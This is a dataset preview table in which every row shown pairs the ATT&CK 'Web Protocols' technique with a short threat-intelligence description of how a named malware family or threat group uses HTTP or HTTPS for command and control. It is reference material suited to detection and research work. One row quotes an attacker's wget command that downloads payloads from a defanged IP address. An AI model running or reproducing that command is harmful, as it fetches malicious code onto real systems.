prompt
stringclasses 508
values | procedure
stringlengths 20
478
|
---|---|
Application Layer Protocol:Web Protocols | ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs. |
Application Layer Protocol:Web Protocols | Agent Tesla has used HTTP for C2 communications. |
Application Layer Protocol:Web Protocols | Amadey has used HTTP for C2 communications. |
Application Layer Protocol:Web Protocols | Anchor has used HTTP and HTTPS in C2 communications. |
Application Layer Protocol:Web Protocols | ANDROMEDA has the ability to make GET requests to download files from C2. |
Application Layer Protocol:Web Protocols | AppleJeus has sent data to its C2 server via POST requests. |
Application Layer Protocol:Web Protocols | AppleSeed has the ability to communicate with C2 over HTTP. |
Application Layer Protocol:Web Protocols | It uses HTTP for C2 communications. |
Application Layer Protocol:Web Protocols | It used HTTP for C2 communications. It also used an HTTP malware variant to communicate over HTTP for C2. |
Application Layer Protocol:Web Protocols | Later implants used by It, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration. |
Application Layer Protocol:Web Protocols | It has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP. |
Application Layer Protocol:Web Protocols | It has used HTTP for command and control. |
Application Layer Protocol:Web Protocols | It uses HTTPS to conceal C2 communications. |
Application Layer Protocol:Web Protocols | It used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS. |
Application Layer Protocol:Web Protocols | It has used HTTP in communications with C2. |
Application Layer Protocol:Web Protocols | It used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits. |
Application Layer Protocol:Web Protocols | Aria-body has used HTTP in C2 communications. |
Application Layer Protocol:Web Protocols | AuTo Stealer can use HTTP to communicate with its C2 servers. |
Application Layer Protocol:Web Protocols | Avenger has the ability to use HTTP in communication with C2. |
Application Layer Protocol:Web Protocols | BackConfig has the ability to use HTTPS for C2 communiations. |
Application Layer Protocol:Web Protocols | BACKSPACE uses HTTP as a transport to communicate with its command server. |
Application Layer Protocol:Web Protocols | BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers. |
Application Layer Protocol:Web Protocols | BADNEWS establishes a backdoor over HTTP. |
Application Layer Protocol:Web Protocols | BadPatch uses HTTP for C2. |
Application Layer Protocol:Web Protocols | Bankshot uses HTTP for command and control communication. |
Application Layer Protocol:Web Protocols | Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications. |
Application Layer Protocol:Web Protocols | BBK has the ability to use HTTP in communications with C2. |
Application Layer Protocol:Web Protocols | BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server. |
Application Layer Protocol:Web Protocols | Bisonal has used HTTP for C2 communications. |
Application Layer Protocol:Web Protocols | It has used HTTP POST requests for C2. |
Application Layer Protocol:Web Protocols | BlackEnergy communicates with its C2 server over HTTP. |
Application Layer Protocol:Web Protocols | BlackMould can send commands to C2 in the body of HTTP POST requests. |
Application Layer Protocol:Web Protocols | BLINDINGCAN has used HTTPS over port 443 for command and control. |
Application Layer Protocol:Web Protocols | BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API. |
Application Layer Protocol:Web Protocols | BoomBox has used HTTP POST requests for C2. |
Application Layer Protocol:Web Protocols | It malware has used HTTP for C2. |
Application Layer Protocol:Web Protocols | Brute Ratel C4 can use HTTPS and HTTPS for C2 communication. |
Application Layer Protocol:Web Protocols | BUBBLEWRAP can communicate using HTTP or HTTPS. |
Application Layer Protocol:Web Protocols | Bundlore uses HTTP requests for C2. |
Application Layer Protocol:Web Protocols | During C0017, It ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads. |
Application Layer Protocol:Web Protocols | During C0018, the threat actors used HTTP for C2 communications. |
Application Layer Protocol:Web Protocols | During C0021, the threat actors used HTTP for some of their C2 communications. |
Application Layer Protocol:Web Protocols | The It malware communicates to its command server using HTTP with an encrypted payload. |
Application Layer Protocol:Web Protocols | Carberp has connected to C2 servers via HTTP. |
Application Layer Protocol:Web Protocols | Carbon can use HTTP in C2 communications. |
Application Layer Protocol:Web Protocols | Cardinal RAT is downloaded using HTTP over port 443. |
Application Layer Protocol:Web Protocols | Chaes has used HTTP for C2 communications. |
Application Layer Protocol:Web Protocols | CharmPower can use HTTP to communicate with C2. |
Application Layer Protocol:Web Protocols | ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header. |
Application Layer Protocol:Web Protocols | It has used HTTPS for C2 communications. |
Application Layer Protocol:Web Protocols | China Chopper's server component executes code sent via HTTP POST commands. |
Application Layer Protocol:Web Protocols | Various implementations of CHOPSTICK communicate with C2 over HTTP. |
Application Layer Protocol:Web Protocols | Clambling has the ability to communicate over HTTP. |
Application Layer Protocol:Web Protocols | One variant of CloudDuke uses HTTP and HTTPS for C2. |
Application Layer Protocol:Web Protocols | It has used HTTPS for C2. |
Application Layer Protocol:Web Protocols | Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports. |
Application Layer Protocol:Web Protocols | Comnie uses HTTP for C2 communication. |
Application Layer Protocol:Web Protocols | ComRAT has used HTTP requests for command and control. |
Application Layer Protocol:Web Protocols | It has used HTTP for C2 communications. |
Application Layer Protocol:Web Protocols | CORESHELL can communicate over HTTP for C2. |
Application Layer Protocol:Web Protocols | CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers. |
Application Layer Protocol:Web Protocols | CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS. |
Application Layer Protocol:Web Protocols | CreepyDrive can use HTTPS for C2 using the Microsoft Graph API. |
Application Layer Protocol:Web Protocols | CreepySnail can use HTTP for C2. |
Application Layer Protocol:Web Protocols | Crimson can use a HTTP GET request to download its final payload. |
Application Layer Protocol:Web Protocols | Crutch has conducted C2 communications with a Dropbox account using the HTTP API. |
Application Layer Protocol:Web Protocols | CSPY Downloader can use GET requests to download additional payloads from C2. |
Application Layer Protocol:Web Protocols | Cyclops Blink can download files via HTTP and HTTPS. |
Application Layer Protocol:Web Protocols | Dacls can use HTTPS in C2 communications. |
Application Layer Protocol:Web Protocols | DanBot can use HTTP in C2 communication. |
Application Layer Protocol:Web Protocols | It's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string "&&&". |
Application Layer Protocol:Web Protocols | DarkComet can use HTTP for C2 communications. |
Application Layer Protocol:Web Protocols | DarkTortilla has used HTTP and HTTPS for C2. |
Application Layer Protocol:Web Protocols | DarkWatchman uses HTTPS for command and control. |
Application Layer Protocol:Web Protocols | Daserf uses HTTP for C2. |
Application Layer Protocol:Web Protocols | DealersChoice uses HTTP for communication with the C2 server. |
Application Layer Protocol:Web Protocols | DEATHRANSOM can use HTTPS to download files. |
Application Layer Protocol:Web Protocols | Diavol has used HTTP GET and POST requests for C2. |
Application Layer Protocol:Web Protocols | Dipsind uses HTTP for C2. |
Application Layer Protocol:Web Protocols | Doki has communicated with C2 over HTTPS. |
Application Layer Protocol:Web Protocols | Donut can use HTTP to download previously staged shellcode payloads. |
Application Layer Protocol:Web Protocols | down_new has the ability to use HTTP in C2 communications. |
Application Layer Protocol:Web Protocols | DownPaper communicates to its C2 server over HTTP. |
Application Layer Protocol:Web Protocols | DRATzarus can use HTTP or HTTPS for C2 communications. |
Application Layer Protocol:Web Protocols | Dridex has used POST requests and HTTPS for C2 communications. |
Application Layer Protocol:Web Protocols | Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request. |
Application Layer Protocol:Web Protocols | DustySky has used both HTTP and HTTPS for C2. |
Application Layer Protocol:Web Protocols | Dyre uses HTTPS for C2 communications. |
Application Layer Protocol:Web Protocols | Egregor has communicated with its C2 servers via HTTPS protocol. |
Application Layer Protocol:Web Protocols | Elise communicates over HTTP or HTTPS for C2. |
Application Layer Protocol:Web Protocols | ELMER uses HTTP for command and control. |
Application Layer Protocol:Web Protocols | Emissary uses HTTP or HTTPS for C2. |
Application Layer Protocol:Web Protocols | Emotet has used HTTP for command and control. |
Application Layer Protocol:Web Protocols | Empire can conduct command and control over protocols like HTTP and HTTPS. |
Application Layer Protocol:Web Protocols | Epic uses HTTP and HTTPS for C2 communications. |
Application Layer Protocol:Web Protocols | EvilBunny has executed C2 commands directly via HTTP. |
Application Layer Protocol:Web Protocols | Exaramel for Linux uses HTTPS for C2 communications. |
Application Layer Protocol:Web Protocols | Explosive has used HTTP for communication. |
Application Layer Protocol:Web Protocols | FatDuke can be controlled via a custom C2 protocol over HTTP. |
Application Layer Protocol:Web Protocols | Felismus uses HTTP for C2. |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.